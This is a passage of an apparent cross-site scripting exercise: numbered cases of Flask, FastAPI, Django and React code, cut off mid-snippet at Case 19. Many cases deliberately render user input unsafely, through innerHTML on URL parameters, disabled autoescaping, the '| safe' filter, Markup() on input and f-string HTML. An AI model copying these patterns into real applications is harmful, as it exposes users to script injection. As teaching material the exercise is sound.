class="n">quote</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/redirect-preview</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">redirect_preview</span><span class="p">():</span> <span class="n">destination</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">to</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/</span><span class="sh">"</span><span class="p">)</span> <span class="n">safe_dest</span> <span class="o">=</span> <span class="nf">quote</span><span class="p">(</span><span class="n">destination</span><span class="p">,</span> <span class="n">safe</span><span class="o">=</span><span class="sh">"</span><span class="s">/:?=&amp;</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template_string</span><span class="p">(</span><span class="sh">"""</span><span class="s"> &lt;html&gt; &lt;body&gt; &lt;a href=</span><span class="sh">"</span><span class="s">{{ dest }}</span><span class="sh">"</span><span class="s">&gt;Click here to continue&lt;/a&gt; &lt;/body&gt; &lt;/html&gt; </span><span class="sh">"""</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="n">safe_dest</span><span class="p">)</span> </code></pre> </div> <h3> Case 6 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="kn">import</span> <span class="n">html</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/comment</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">comment</span><span class="p">():</span> <span class="n">user_comment</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">comment</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">safe_comment</span> <span class="o">=</span> <span class="n">html</span><span class="p">.</span><span class="nf">escape</span><span class="p">(</span><span class="n">user_comment</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">comment.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">comment</span><span class="o">=</span><span class="n">safe_comment</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/comment.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;p&gt;</span>Your comment: {{ comment }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 7 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span> <span class="kn">from</span> <span class="n">fastapi.responses</span> <span class="kn">import</span> <span class="n">HTMLResponse</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/search</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">search</span><span class="p">(</span><span class="n">q</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">""</span><span class="p">):</span> <span class="n">html</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"""</span><span class="s"> &lt;html&gt; &lt;body&gt; &lt;h2&gt;Results for: </span><span class="si">{</span><span class="n">q</span><span class="si">}</span><span class="s">&lt;/h2&gt; &lt;/body&gt; &lt;/html&gt; </span><span class="sh">"""</span> <span class="k">return</span> <span class="nc">HTMLResponse</span><span class="p">(</span><span class="n">content</span><span class="o">=</span><span class="n">html</span><span class="p">)</span> </code></pre> </div> <h3> Case 8 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span> <span class="kn">from</span> <span class="n">fastapi.responses</span> <span class="kn">import</span> <span class="n">JSONResponse</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/api/username</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_username</span><span class="p">(</span><span class="n">name</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">""</span><span class="p">):</span> <span class="k">return</span> <span class="nc">JSONResponse</span><span class="p">(</span><span class="n">content</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span> <span class="n">name</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- index.html (served separately) --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"greeting"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">/api/username?name=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">name=</span><span class="dl">"</span><span class="p">)[</span><span class="mi">1</span><span class="p">])</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">r</span> <span class="o">=&gt;</span> <span class="nx">r</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">data</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">greeting</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Hello, </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">data</span><span class="p">.</span><span class="nx">username</span><span class="p">;</span> <span class="p">});</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 9 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span> <span class="kn">from</span> <span class="n">fastapi.responses</span> <span class="kn">import</span> <span class="n">JSONResponse</span> <span class="kn">import</span> <span class="n">html</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/api/comment</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_comment</span><span class="p">(</span><span class="n">text</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">""</span><span class="p">):</span> <span class="n">safe_text</span> <span class="o">=</span> <span class="n">html</span><span class="p">.</span><span class="nf">escape</span><span class="p">(</span><span class="n">text</span><span class="p">)</span> <span class="k">return</span> <span class="nc">JSONResponse</span><span class="p">(</span><span class="n">content</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">comment</span><span class="sh">"</span><span class="p">:</span> <span class="n">safe_text</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// App.jsx (React frontend)</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">useEffect</span><span class="p">,</span> <span class="nx">useRef</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">react</span><span class="dl">"</span><span class="p">;</span> <span class="kd">function</span> <span class="nf">CommentBox</span><span class="p">({</span> <span class="nx">comment</span> <span class="p">})</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">ref</span> <span class="o">=</span> <span class="nf">useRef</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span> <span class="nf">useEffect</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">ref</span><span class="p">.</span><span class="nx">current</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">comment</span><span class="p">;</span> <span class="p">},</span> <span class="p">[</span><span class="nx">comment</span><span class="p">]);</span> <span class="k">return</span> <span class="o">&lt;</span><span class="nx">div</span> <span class="nx">ref</span><span class="o">=</span><span class="p">{</span><span class="nx">ref</span><span class="p">}</span> <span class="sr">/&gt;</span><span class="err">; </span><span class="p">}</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">loadComment</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">params</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">/api/comment?text=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">text</span><span class="dl">"</span><span class="p">));</span> <span class="kd">const</span> <span class="nx">data</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">();</span> <span class="k">return</span> <span class="o">&lt;</span><span class="nx">CommentBox</span> <span class="nx">comment</span><span class="o">=</span><span class="p">{</span><span class="nx">data</span><span class="p">.</span><span class="nx">comment</span><span class="p">}</span> <span class="sr">/&gt;</span><span class="err">; </span><span class="p">}</span> </code></pre> </div> <h3> Case 10 </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- index.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"username-display"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"bio-display"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">params</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">username</span> <span class="o">=</span> <span class="nx">params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">username</span><span class="dl">"</span><span class="p">)</span> <span class="o">||</span> <span class="dl">"</span><span class="s2">guest</span><span class="dl">"</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">bio</span> <span class="o">=</span> <span class="nx">params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">bio</span><span class="dl">"</span><span class="p">)</span> <span class="o">||</span> <span class="dl">""</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">username-display</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">User: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">username</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">bio-display</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Bio: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">bio</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 11 </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// hooks/useRichText.js</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">useEffect</span><span class="p">,</span> <span class="nx">useRef</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">react</span><span class="dl">"</span><span class="p">;</span> <span class="k">export</span> <span class="kd">function</span> <span class="nf">useRichText</span><span class="p">(</span><span class="nx">content</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">ref</span> <span class="o">=</span> <span class="nf">useRef</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span> <span class="nf">useEffect</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">ref</span><span class="p">.</span><span class="nx">current</span><span class="p">)</span> <span class="p">{</span> <span class="nx">ref</span><span class="p">.</span><span class="nx">current</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">content</span><span class="p">;</span> <span class="p">}</span> <span class="p">},</span> <span class="p">[</span><span class="nx">content</span><span class="p">]);</span> <span class="k">return</span> <span class="nx">ref</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// App.jsx</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">useRichText</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">./hooks/useRichText</span><span class="dl">"</span><span class="p">;</span> <span class="kd">function</span> <span class="nf">ReviewCard</span><span class="p">({</span> <span class="nx">reviewText</span> <span class="p">})</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">ref</span> <span class="o">=</span> <span class="nf">useRichText</span><span class="p">(</span><span class="nx">reviewText</span><span class="p">);</span> <span class="k">return</span> <span class="o">&lt;</span><span class="nx">div</span> <span class="nx">className</span><span class="o">=</span><span class="dl">"</span><span class="s2">review</span><span class="dl">"</span> <span class="nx">ref</span><span class="o">=</span><span class="p">{</span><span class="nx">ref</span><span class="p">}</span> <span class="sr">/&gt;</span><span class="err">; </span><span class="p">}</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">loadReview</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">params</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">reviewText</span> <span class="o">=</span> <span class="nx">params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">review</span><span class="dl">"</span><span class="p">)</span> <span class="o">||</span> <span class="dl">""</span><span class="p">;</span> <span class="k">return</span> <span class="o">&lt;</span><span class="nx">ReviewCard</span> <span class="nx">reviewText</span><span class="o">=</span><span class="p">{</span><span class="nx">reviewText</span><span class="p">}</span> <span class="sr">/&gt;</span><span class="err">; </span><span class="p">}</span> </code></pre> </div> <h3> Case 12 </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- index.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"search-banner"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">renderBanner</span><span class="p">(</span><span class="nx">container</span><span class="p">,</span> <span class="nx">label</span><span class="p">,</span> <span class="nx">value</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">encoded</span> <span class="o">=</span> <span class="nf">encodeURIComponent</span><span class="p">(</span><span class="nx">value</span><span class="p">);</span> <span class="nx">container</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">&lt;p&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">label</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">encoded</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/p&gt;</span><span class="dl">"</span><span class="p">;</span> <span class="p">}</span> <span class="kd">const</span> <span class="nx">params</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">query</span> <span class="o">=</span> <span class="nx">params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">q</span><span class="dl">"</span><span class="p">)</span> <span class="o">||</span> <span class="dl">""</span><span class="p">;</span> <span class="nf">renderBanner</span><span class="p">(</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">search-banner</span><span class="dl">"</span><span class="p">),</span> <span class="dl">"</span><span class="s2">You searched for</span><span class="dl">"</span><span class="p">,</span> <span class="nx">query</span> <span class="p">);</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 13 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">myapp.models</span> <span class="kn">import</span> <span class="n">Announcement</span> <span class="k">def</span> <span class="nf">announcements</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">items</span> <span class="o">=</span> <span class="n">Announcement</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">values_list</span><span class="p">(</span><span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">,</span> <span class="n">flat</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">announcements.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">items</span><span class="sh">"</span><span class="p">:</span> <span class="n">items</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- announcements.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h2&gt;</span>Latest Announcements<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;ul&gt;</span> {% autoescape off %} {% for item in items %} <span class="nt">&lt;li&gt;</span>{{ item }}<span class="nt">&lt;/li&gt;</span> {% endfor %} {% endautoescape %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 14 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">Markup</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/welcome</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">welcome</span><span class="p">():</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">guest</span><span class="sh">"</span><span class="p">)</span> <span class="n">greeting</span> <span class="o">=</span> <span class="nc">Markup</span><span class="p">(</span><span class="sh">"</span><span class="s">Welcome, %s!</span><span class="sh">"</span> <span class="o">%</span> <span class="n">username</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">welcome.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">greeting</span><span class="o">=</span><span class="n">greeting</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/welcome.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;p&gt;</span>{{ greeting }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 15 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/dashboard</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">dashboard</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">username</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">"</span><span class="s">guest</span><span class="sh">"</span><span class="p">):</span> <span class="n">user_data</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">:</span> <span class="n">username</span><span class="p">,</span> <span class="sh">"</span><span class="s">role</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">viewer</span><span class="sh">"</span><span class="p">}</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span> <span class="sh">"</span><span class="s">dashboard.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">user_data</span><span class="sh">"</span><span class="p">:</span> <span class="n">user_data</span><span class="p">}</span> <span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/dashboard.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Dashboard<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">userData</span> <span class="o">=</span> <span class="p">{{</span> <span class="nx">user_data</span> <span class="p">}};</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">Logged in as:</span><span class="dl">"</span><span class="p">,</span> <span class="nx">userData</span><span class="p">.</span><span class="nx">name</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 16 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="k">def</span> <span class="nf">profile</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">css_class</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">theme</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">default</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">profile.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">css_class</span><span class="sh">"</span><span class="p">:</span> <span class="n">css_class</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- profile.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">{{</span> <span class="na">css_class</span> <span class="err">}}</span><span class="nt">&gt;</span> <span class="nt">&lt;p&gt;</span>Welcome to your profile.<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 17 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">escape</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="n">comments</span> <span class="o">=</span> <span class="p">[]</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/comment</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">add_comment</span><span class="p">():</span> <span class="n">body</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">comments</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="nf">str</span><span class="p">(</span><span class="nf">escape</span><span class="p">(</span><span class="n">body</span><span class="p">)))</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Comment saved.</span><span class="sh">"</span><span class="p">,</span> <span class="mi">200</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/comments</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">view_comments</span><span class="p">():</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">comments.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">comments</span><span class="o">=</span><span class="n">comments</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/comments.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h2&gt;</span>Comments<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for comment in comments %} <span class="nt">&lt;li&gt;</span>{{ comment | safe }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 18 </h3> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Product Search<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"results"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">query</span> <span class="o">=</span> <span class="nf">decodeURIComponent</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">hash</span><span class="p">.</span><span class="nf">substring</span><span class="p">(</span><span class="mi">1</span><span class="p">));</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">results</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">You searched for: &lt;strong&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">query</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/strong&gt;</span><span class="dl">"</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 19 </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// components/Bio.jsx</span> <span class="kd">function</span> <span class="nf">Bio</span><span class="p">({</span> <span class="nx">username</span> <span class="p">})</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">bio</span><span class="p">,</span> <span class="nx">setBio</span><span class="p">]</span> <span class="o">=</span> <span class="nx">React</span><span class="p">.</span><span 